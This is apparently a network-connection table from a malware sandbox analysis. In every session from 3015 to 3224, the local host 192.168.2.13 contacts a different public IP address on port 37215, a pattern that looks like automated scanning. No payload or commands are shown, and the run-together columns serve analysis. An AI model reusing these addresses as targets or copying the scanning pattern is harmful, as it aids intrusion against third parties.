                                                  3015192.168.2.1346660197.85.244.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3016192.168.2.1348332197.216.251.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3017192.168.2.1339824197.86.10.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3018192.168.2.1335832197.116.172.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3019192.168.2.1351134197.130.64.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3020192.168.2.133378241.241.2.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3021192.168.2.134805441.210.171.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3022192.168.2.1348482203.7.159.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3023192.168.2.1354842166.158.141.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3024192.168.2.1336518197.21.206.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3025192.168.2.1349592197.170.216.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3026192.168.2.1339812197.178.3.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3027192.168.2.133954883.34.54.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3028192.168.2.1357260174.133.247.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3029192.168.2.1345758157.79.29.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3030192.168.2.134129439.46.185.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3031192.168.2.1352304157.35.204.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3032192.168.2.1336236157.206.127.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3033192.168.2.1351880197.149.250.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3034192.168.2.1358808197.46.89.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3035192.168.2.1348594197.89.36.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3036192.168.2.1356042197.120.129.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3037192.168.2.134001040.183.150.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3038192.168.2.134481841.236.172.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3039192.168.2.1357622197.90.97.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3040192.168.2.1358970157.225.158.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3041192.168.2.135000841.222.141.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3042192.168.2.1345120197.140.97.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3043192.168.2.133342441.160.151.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3044192.168.2.134690641.229.240.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3045192.168.2.1345368130.154.83.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3046192.168.2.1357478197.201.70.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3047192.168.2.135173068.200.16.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3048192.168.2.1355406157.70.191.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3049192.168.2.135335041.161.114.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3050192.168.2.1341000197.50.94.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3051192.168.2.135137672.90.84.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3052192.168.2.135406841.78.77.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3053192.168.2.134646013.184.227.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3054192.168.2.1345586197.52.156.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3055192.168.2.133844678.135.46.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3056192.168.2.1338380157.68.223.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3057192.168.2.134979641.60.39.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3058192.168.2.1349218157.234.92.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3059192.168.2.1344148197.20.83.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3060192.168.2.133539673.100.73.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3061192.168.2.1346522144.77.123.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3062192.168.2.134167241.156.52.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3063192.168.2.135990841.37.240.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3064192.168.2.1356160157.135.90.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3065192.168.2.134169241.142.181.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3066192.168.2.1346294197.232.246.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3067192.168.2.134803886.39.117.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3068192.168.2.1339384197.66.202.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3069192.168.2.1346086157.252.76.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3070192.168.2.1359628157.244.125.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3071192.168.2.1348992196.75.107.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3072192.168.2.1344106197.52.30.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3073192.168.2.1354168157.122.118.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3074192.168.2.133467051.22.242.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3075192.168.2.1359348197.146.230.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3076192.168.2.1338008197.203.126.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3077192.168.2.135903066.100.93.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3078192.168.2.1351184197.78.112.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3079192.168.2.1345884197.140.181.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3080192.168.2.1348060157.195.4.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3081192.168.2.1355098157.42.235.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3082192.168.2.1334572197.97.197.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3083192.168.2.1342992107.205.34.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3084192.168.2.1340420157.27.188.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3085192.168.2.136040241.190.64.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3086192.168.2.134327841.173.119.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3087192.168.2.135310841.232.119.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3088192.168.2.1343124197.241.11.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3089192.168.2.1343890157.174.29.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3090192.168.2.1332888157.34.255.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3091192.168.2.133920244.144.61.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3092192.168.2.1345596197.23.142.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3093192.168.2.133605441.181.192.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3094192.168.2.134888253.18.70.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3095192.168.2.1334092197.38.91.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3096192.168.2.1355530197.26.80.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3097192.168.2.1349314197.39.24.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3098192.168.2.135588041.220.160.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3099192.168.2.135547441.30.118.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3100192.168.2.1334060202.122.203.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3101192.168.2.135062261.161.42.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3102192.168.2.134621841.184.109.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3103192.168.2.1335632157.54.130.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3104192.168.2.1336188157.198.141.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3105192.168.2.1360398197.16.231.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3106192.168.2.1358444157.82.45.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3107192.168.2.135106041.148.205.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3108192.168.2.135252888.165.114.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3109192.168.2.1348210157.76.135.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3110192.168.2.1341686157.60.21.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3111192.168.2.1348218197.138.104.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3112192.168.2.135104887.208.224.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3113192.168.2.1336546197.127.115.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3114192.168.2.135386041.171.229.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3115192.168.2.1355714197.32.253.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3116192.168.2.135973641.192.74.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3117192.168.2.1358572197.77.236.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3118192.168.2.1354268197.242.240.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3119192.168.2.1334100197.61.182.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3120192.168.2.134909041.134.38.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3121192.168.2.135026841.128.7.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3122192.168.2.1343376157.96.167.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3123192.168.2.1357592157.24.6.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3124192.168.2.134830041.77.15.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3125192.168.2.134491495.8.216.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3126192.168.2.134594841.60.184.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3127192.168.2.1352582197.101.246.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3128192.168.2.1338584197.187.225.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3129192.168.2.1355318197.214.214.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3130192.168.2.135990641.246.188.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3131192.168.2.1335634197.91.40.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3132192.168.2.1341042157.82.144.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3133192.168.2.1359282157.152.47.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3134192.168.2.1341964157.106.39.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3135192.168.2.1359320157.27.217.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3136192.168.2.1342012189.239.108.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3137192.168.2.1338794116.124.136.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3138192.168.2.1359828197.157.6.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3139192.168.2.1359352166.224.57.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3140192.168.2.1341906197.130.218.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3141192.168.2.134260441.18.23.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3142192.168.2.1358988197.24.105.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3143192.168.2.1339170197.221.53.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3144192.168.2.1337340197.245.152.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3145192.168.2.135523841.98.165.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3146192.168.2.135070041.83.112.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3147192.168.2.1358092182.215.87.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3148192.168.2.1344290149.168.40.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3149192.168.2.133277841.253.158.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3150192.168.2.1358306157.12.151.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3151192.168.2.134279041.181.3.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3152192.168.2.134578441.251.40.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3153192.168.2.1355840197.181.156.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3154192.168.2.1341726197.9.56.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3155192.168.2.1348944133.20.112.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3156192.168.2.134600041.210.59.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3157192.168.2.1340164143.30.131.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3158192.168.2.134765041.28.20.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3159192.168.2.1334346197.230.134.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3160192.168.2.134308641.96.211.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3161192.168.2.1342938157.75.47.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3162192.168.2.1333042197.232.52.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3163192.168.2.1342354157.160.248.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3164192.168.2.134074041.144.245.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3165192.168.2.1338832197.205.26.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3166192.168.2.1349458157.47.104.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3167192.168.2.133604462.231.60.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3168192.168.2.135034814.161.175.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3169192.168.2.1352574157.251.103.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3170192.168.2.1357724197.210.145.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3171192.168.2.1351062197.61.224.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3172192.168.2.134318841.147.135.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3173192.168.2.135360641.17.142.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3174192.168.2.1359974197.31.235.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3175192.168.2.1347162157.253.37.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3176192.168.2.133920841.41.99.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3177192.168.2.1336350141.116.116.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3178192.168.2.1357886197.191.177.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3179192.168.2.135394041.63.78.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3180192.168.2.1354358210.121.114.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3181192.168.2.1353756197.171.148.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3182192.168.2.134578241.122.129.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3183192.168.2.1352608197.197.12.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3184192.168.2.1360074197.41.169.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3185192.168.2.134174641.40.126.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3186192.168.2.135111841.125.220.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3187192.168.2.134333841.45.107.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3188192.168.2.1349530117.201.140.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3189192.168.2.1356730197.237.148.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3190192.168.2.1345596197.94.213.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3191192.168.2.1347184197.151.86.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3192192.168.2.1349184157.209.104.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3193192.168.2.1355890157.166.224.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3194192.168.2.1341126197.170.50.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3195192.168.2.1349464129.76.77.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3196192.168.2.134050441.37.10.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3197192.168.2.136037641.154.189.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3198192.168.2.1348668197.155.240.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3199192.168.2.1345878130.182.97.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3200192.168.2.1348376157.109.190.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3201192.168.2.134041625.194.54.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3202192.168.2.1346332157.11.229.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3203192.168.2.135624241.133.210.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3204192.168.2.1350110194.188.73.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3205192.168.2.134569852.61.159.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3206192.168.2.1343304197.174.182.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3207192.168.2.135701241.152.39.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3208192.168.2.134413841.111.250.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3209192.168.2.1355932157.138.139.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3210192.168.2.1333788157.46.139.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3211192.168.2.1342226197.188.173.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3212192.168.2.134597245.196.146.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3213192.168.2.1341160197.220.204.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3214192.168.2.1347260197.167.115.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3215192.168.2.1336584157.160.8.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3216192.168.2.134611041.26.223.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3217192.168.2.1355370157.239.43.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3218192.168.2.1338160117.39.110.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3219192.168.2.133734241.213.34.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3220192.168.2.1360282197.148.204.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3221192.168.2.135266041.215.13.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3222192.168.2.135869241.214.4.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3223192.168.2.1342926159.123.236.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3224192.168.2.1355210197.226.198.23437215
